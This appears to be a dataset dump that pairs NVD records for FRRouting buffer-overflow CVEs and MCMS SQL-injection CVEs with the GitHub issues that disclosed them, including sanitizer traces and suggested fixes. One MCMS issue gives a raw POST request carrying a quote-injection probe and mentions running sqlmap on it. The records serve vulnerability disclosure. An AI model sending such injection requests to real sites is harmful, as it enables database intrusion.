cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2022-26125
2022-03-03T18:15:08.090
Buffer overflow vulnerabilities exist in FRRouting through 8.1.0 due to wrong checks on the input packet length in isisd/isis_tlvs.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FRRouting/frr/issues/10507" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00019.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FRRouting/frr/issues/10507" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00019.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:*", "matchCriteriaId": "08E82B0A-1839-49BF-887B-DDE6010562D6", "versionEndExcluding": null, "versionEndIncluding": "8.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1284" ]
1284
https://github.com/FRRouting/frr/issues/10507
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FRRouting", "frr" ]
https://github.com/FRRouting/frr/blob/18ed776ca29533f6c49479b1a0dd95d36bb6b5ec/isisd/isis_tlvs.c#L3004-L3114 There are a few issues in the loop above leading to overflow vulnerabilities. The loop condition is `subtlv_len > 2` and `subtlv_len` is updated at the end of the loop (Line 3113: `subtlv_len = subtlv_len - length - 2`). **The Issue on Loop Condition**: at Line 3113, when we update `subtlv_len`, if `subtlv_len < length + 2`, integer overflow will happen, leading to heap overflows in the next loop iteration. Note that `subtlv_len` and `length` are of `uint8_t`, which makes it easy to overflow, e.g., `subtlv_len=35`, `length=38`... An example output of the address sanitizer can be found below: ``` 2022/02/05 21:54:53 ISIS: [S48XV-GT1WC][EC 100663311] stream_getc: Attempt to get char out of bounds 2022/02/05 21:54:53 ISIS: [RF6RD-ZCBTC][EC 100663311] &(struct stream): 0x61200000f940, size: 231, getp: 74, endp: 74 ==86437==     #1 0x7fe6ec3a118a in __libc_signal_restore_set /build/glibc-eX1tMB/glibc-2.31/signal/../sysdeps/unix/sysv/linux/internal-signals.h:86:3     #2 0x7fe6ec3a118a in raise /build/glibc-eX1tMB/glibc-2.31/signal/../sysdeps/unix/sysv/linux/raise.c:48:3     #3 0x7fe6ec380858 in abort /build/glibc-eX1tMB/glibc-2.31/stdlib/abort.c:79:7     #4 0x880f5c in _zlog_assert_failed /home/parallels/myfrr/lib/zlog.c:700:2     #5 0x7f2f6f in stream_getc /home/parallels/myfrr/lib/stream.c     #6 0x63c10c in unpack_tlv_router_cap /home/parallels/myfrr/isisd/isis_tlvs.c:3016:10     #7 0x6242a5 in unpack_tlv /home/parallels/myfrr/isisd/isis_tlvs.c:4332:10     #8 0x6242a5 in unpack_tlvs /home/parallels/myfrr/isisd/isis_tlvs.c:4354:8     #9 0x623ce4 in isis_unpack_tlvs /home/parallels/myfrr/isisd/isis_tlvs.c:4385:7     #10 0x5d5b5b in process_lsp /home/parallels/myfrr/isisd/isis_pdu.c:940:6     #11 0x5cf009 in isis_handle_pdu /home/parallels/myfrr/isisd/isis_pdu.c:1781:12 ``` **Other Issues**: at Line 3016, Line 3021, Line 3062, Line 3067, and Line 3098, I think we need to use `break` instead of `continue`. Using `continue` will let us miss the update of the loop condition variable at Line 3113. Please check if my understanding of the code above is correct. If so, I can make a pull request to fix these issues then.
isisd: overflow bugs in unpack_tlv_router_cap
https://api.github.com/repos/FRRouting/frr/issues/10507/comments
21
2022-02-06T03:32:58Z
2022-03-29T11:10:30Z
https://github.com/FRRouting/frr/issues/10507
1,125,093,957
10,507
3,280
CVE-2022-26126
2022-03-03T18:15:08.143
Buffer overflow vulnerabilities exist in FRRouting through 8.1.0 due to the use of strdup with a non-zero-terminated binary string in isis_nb_notifications.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FRRouting/frr/issues/10505" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00019.html" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MIEQNIWUSBQTFR65HM2LLIB7PH27CZUZ/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VTYSAL4QCE4XWMMBKUB7LSLPAFLWUML4/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XUCZR6RYQVZ35BFUV7OLIUEHZW2433I2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FRRouting/frr/issues/10505" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00019.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MIEQNIWUSBQTFR65HM2LLIB7PH27CZUZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VTYSAL4QCE4XWMMBKUB7LSLPAFLWUML4/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XUCZR6RYQVZ35BFUV7OLIUEHZW2433I2/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:*", "matchCriteriaId": "162AA0AE-3CBF-4961-AAC0-DAD4C6495E0E", "versionEndExcluding": "8.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/FRRouting/frr/issues/10505
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FRRouting", "frr" ]
At Line 470 in the code below, we call `yang_data_new`, which will further call `strdup(raw_pdu)`. However, `raw_pdu` is not guaranteed to be a zero-terminated string and, thus, will lead to a stack overflow in `strdup`. When I set `raw_pdu[raw_pdu_len - 1]` to `\0`, then the bug disappears. Note that `strdup` should be used with a C-string. In the same file, `isis_nb_notifications.c`, there are **8 places** where `yang_data_new` are used with `raw_pdu` and, thus, may have the overflow bug. Please check and suggest a fix. I can give a pull request then. https://github.com/FRRouting/frr/blob/eef8006341e85d80d0a3c21a642ced3b73a42375/isisd/isis_nb_notifications.c#L454-L471 What follows is the output of the address sanitizer: ``` ==48351==ERROR: AddressSanitizer: dynamic-stack-buffer-overflow on address 0x7ffe596a3a76 at pc 0x000000543e97 bp 0x7ffe596a3020 sp 0x7ffe596a27e0 READ of size 23 at 0x7ffe596a3a76 thread T0     #0 0x543e96 in strdup (/home/parallels/myfrr/isisd/isisd+0x543e96)     #1 0x84f73d in yang_data_new /home/parallels/myfrr/lib/yang.c:608:17     #2 0x6716eb in isis_notif_id_len_mismatch /home/parallels/myfrr/isisd/isis_nb_notifications.c:470:9     #3 0x5cedcf in isis_handle_pdu /home/parallels/myfrr/isisd/isis_pdu.c:1706:3 ```
isisd: misusing strdup leads to stack overflow
https://api.github.com/repos/FRRouting/frr/issues/10505/comments
6
2022-02-05T05:11:16Z
2022-03-28T18:26:03Z
https://github.com/FRRouting/frr/issues/10505
1,124,837,704
10,505
3,281
CVE-2022-26127
2022-03-03T18:15:08.193
A buffer overflow vulnerability exists in FRRouting through 8.1.0 due to missing a check on the input packet length in the babel_packet_examin function in babeld/message.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FRRouting/frr/issues/10487" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00019.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FRRouting/frr/issues/10487" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00019.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:*", "matchCriteriaId": "08E82B0A-1839-49BF-887B-DDE6010562D6", "versionEndExcluding": null, "versionEndIncluding": "8.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1284" ]
1284
https://github.com/FRRouting/frr/issues/10487
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FRRouting", "frr" ]
The code below misses a check on the relationship between `packetlen` and `bodylen` before Line 298, which may lead to buffer overflows when accessing the memory at Line 300 and Line 309. https://github.com/FRRouting/frr/blob/3d1ff4bfdb159583a62e72ccb359a8508c4cbb2e/babeld/message.c#L289-L309 To fix, we may put the code below before the while loop: ``` if (packetlen < bodylen + 4) { debugf(BABEL_DEBUG_COMMON,"Received truncated message."); return 1; } ``` The output of the address sanitizer: ``` ==271648==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000114 at pc 0x00000059301a bp 0x7fff3f7301f0 sp 0x7fff3f7301e8 READ of size 1 at 0x603000000114 thread T0     #0 0x593019 in babel_packet_examin /home/parallels/myfrr/babeld/message.c:300:16     #1 0x593019 in parse_packet /home/parallels/myfrr/babeld/message.c:354:9 ```
Miss a check on length in Babel
https://api.github.com/repos/FRRouting/frr/issues/10487/comments
3
2022-02-03T02:44:29Z
2022-03-28T18:25:30Z
https://github.com/FRRouting/frr/issues/10487
1,122,594,188
10,487
3,282
CVE-2022-26128
2022-03-03T18:15:08.243
A buffer overflow vulnerability exists in FRRouting through 8.1.0 due to a wrong check on the input packet length in the babel_packet_examin function in babeld/message.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FRRouting/frr/issues/10502" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00019.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FRRouting/frr/issues/10502" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00019.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:*", "matchCriteriaId": "08E82B0A-1839-49BF-887B-DDE6010562D6", "versionEndExcluding": null, "versionEndIncluding": "8.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1284" ]
1284
https://github.com/FRRouting/frr/issues/10502
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FRRouting", "frr" ]
The check at Line 310 is not correct. It should be `i + len + 2 > bodylen` rather than `i + len > bodylen`, because `len` does not include the first two bytes, i.e., `message[0]` and `message[1]` https://github.com/FRRouting/frr/blob/ab68283ceedc05ea1a7f9c54f03a87f5dc199a01/babeld/message.c#L300-L312
Incorrect checks on length in babeld
https://api.github.com/repos/FRRouting/frr/issues/10502/comments
2
2022-02-04T18:10:06Z
2022-03-28T18:25:13Z
https://github.com/FRRouting/frr/issues/10502
1,124,478,987
10,502
3,283
CVE-2022-26129
2022-03-03T18:15:08.287
Buffer overflow vulnerabilities exist in FRRouting through 8.1.0 due to wrong checks on the subtlv length in the functions, parse_hello_subtlv, parse_ihu_subtlv, and parse_update_subtlv in babeld/message.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FRRouting/frr/issues/10503" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00019.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FRRouting/frr/issues/10503" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00019.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:*", "matchCriteriaId": "08E82B0A-1839-49BF-887B-DDE6010562D6", "versionEndExcluding": null, "versionEndIncluding": "8.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/FRRouting/frr/issues/10503
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FRRouting", "frr" ]
https://github.com/FRRouting/frr/blob/e743c1b8e7989d7e3dc9092603bfb638958fa166/babeld/message.c#L131-L151 Line 143: the condition should be `i + 1 >= alen` instead of `i + 1 > alen`. Otherwise, overflows will happen at 147. Line 148: the condition should be `i + len + 2 > alen` instead of `i + len > alen`. We need include extra two bytes, a[i] and a[i + 1] in this check.
babeld: bugs in parse_hello_subtlv, parse_ihu_subtlv, and parse_update_subtlv
https://api.github.com/repos/FRRouting/frr/issues/10503/comments
6
2022-02-04T21:17:08Z
2022-03-28T18:29:44Z
https://github.com/FRRouting/frr/issues/10503
1,124,623,649
10,503
3,284
CVE-2022-23898
2022-03-03T19:15:08.777
MCMS v5.2.5 was discovered to contain a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ming-soft/MCMS/issues/62" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ming-soft/MCMS/issues/62" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:*", "matchCriteriaId": "7A74A0D5-A438-4804-B9BE-1ED20C9BCB26", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ming-soft/MCMS/issues/62
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ming-soft", "MCMS" ]
A suspicious point was found in the `IContentDao.xml` file <img width="953" alt="image" src="https://user-images.githubusercontent.com/47287118/150347037-bc446f1c-5e97-4a41-897a-18c0370ff8db.png"> Since the `id` of `select` maps to a method in Java, and this XML corresponds to Content, we looked directly in `ComtentAction.java` and found a call to <img width="949" alt="image" src="https://user-images.githubusercontent.com/47287118/150347149-c7bfda03-8d93-41dd-b48f-dd9dd48f7ae7.png"> Next we try to inject, see the top class definition of `ComtentAction.java` of the file, we can know that the route is `host:port/cms/content`, and then Adding the method to be called, we can get the route as `host:port/cms/content/list`, and from the placeholder of `IContentDao.xml`, we can know that the suspicious injection point is `categoryId`, and then try to inject ``` POST /cms/content/list HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: Phpstorm-f0bc0443=05da4cd3-973a-421b-afa6-a7c2e0ed2f79; Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Content-Type: application/x-www-form-urlencoded Content-Length: 14 contentType=1' ``` <img width="940" alt="image" src="https://user-images.githubusercontent.com/47287118/150347530-e9614dc7-310f-4617-b885-61d693d14602.png"> --- As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run <img width="945" alt="image" src="https://user-images.githubusercontent.com/47287118/150347659-c81a26f9-e36a-4fd5-a0ba-a235c91c5c6b.png"> <img width="951" alt="image" src="https://user-images.githubusercontent.com/47287118/150347692-8506abc0-92a5-4284-8792-6c20df64c65c.png"> <img width="952" alt="image" src="https://user-images.githubusercontent.com/47287118/150347739-24e2f92e-8fe8-4bd5-a6cf-bc4ffbf2e54a.png"> <img width="943" alt="image" src="https://user-images.githubusercontent.com/47287118/150347724-6031af97-bafd-4e97-936a-8810d2ad9e93.png">
MCMS5.2.5 SQLI
https://api.github.com/repos/ming-soft/MCMS/issues/62/comments
0
2022-01-20T13:28:38Z
2024-04-23T07:18:22Z
https://github.com/ming-soft/MCMS/issues/62
1,109,303,384
62
3,285
CVE-2022-23899
2022-03-03T19:15:08.843
MCMS v5.2.5 was discovered to contain a SQL injection vulnerability via search.do in the file /web/MCmsAction.java.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ming-soft/MCMS/issues/63" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ming-soft/MCMS/issues/63" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:*", "matchCriteriaId": "7A74A0D5-A438-4804-B9BE-1ED20C9BCB26", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ming-soft/MCMS/issues/63
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ming-soft", "MCMS" ]
